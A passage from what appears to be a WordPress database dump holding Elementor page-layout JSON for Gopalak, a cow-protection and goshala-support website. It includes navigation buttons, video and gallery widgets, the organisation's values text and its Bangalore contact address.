here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9744,1640,'_elementor_page_assets','a:0:{}'),(9753,1642,'_elementor_edit_mode','builder'),(9754,1642,'_elementor_template_type','wp-page'),(9755,1642,'_elementor_version','3.7.8'),(9756,1642,'_wp_page_template','elementor_canvas'),(9757,1642,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"taiowc-thumb-img\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}],\"background_repeat\":\"no-repeat\"},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Values\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1795b3e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#154833\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 